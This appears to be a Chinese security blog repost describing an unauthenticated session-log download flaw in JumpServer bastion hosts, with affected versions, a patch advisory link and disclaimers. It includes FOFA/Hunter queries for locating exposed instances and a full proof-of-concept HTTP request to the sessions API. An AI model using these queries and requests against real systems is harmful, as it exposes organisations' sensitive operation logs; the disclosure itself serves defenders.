免责声明
月落星沉研究室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他违法行为!!!
JumpServer的权限管理存在缺陷,未经授权的远程攻击者可以下载历史会话连接期间的所有操作日志,可导致敏感信息泄漏。
JumpServer是一款开源的堡垒机和权限管理系统,旨在帮助企业实现对服务器和网络设备的安全管理和访问控制。JumpServer的权限管理存在缺陷,未经授权的远程攻击者可以下载历史会话连接期间的所有操作日志。经过分析和研判,该漏洞利用难度低,可导致敏感信息泄漏。
影响版本
3.0
.0
<= version <=
3.5
.4
3.6
.0
<= version <=
3.6
.3
hunter语法:app.name=
"JumpServer"
FOFA:app=
"JumpServer-堡垒机"
请求包
GET
/api/v1/terminal/sessions/
HTTP/1.1
Host
: XX.XX.XX.XX
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding
: gzip, deflate
Accept-Language
: zh-CN,zh;q=0.9,ak;q=0.8
Cookie
: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; jms_sessionid=tl4l16mf5x23mg0g2ku5npf2q2apru18
Connection
: close
响应包
HTTP/1.1
200
OK
Server
: nginx
Date
: Wed, 20 Sep 2023 02:09:54 GMT
Content-Type
: application/json
Content-Length
: 759031
Connection
: close
Vary
: Accept, Accept-Language, Cookie
Allow
: GET, POST, PUT, PATCH, DELETE, HEAD, OPTIONS
X-Frame-Options
: DENY
Content-Language
: zh-hans
X-Content-Type-Options
: nosniff
Referrer-Policy
: same-origin
Set-Cookie
: jms_sessionid=tl4l16mf5x23mg0g2ku5npf2q2apru18; HttpOnly; Path=/; SameSite=Lax
[
]
修复建议
官方已发布修复方案,受影响的用户建议联系官方获取安全补丁。
https:
/
/github.com/jumpserver
/jumpserver/security
/advisories/
GHSA-
633
x-
3
f4f-v9rw
原文始发于微信公众号(月落安全):2023热乎漏洞--JumpServer未授权访问漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论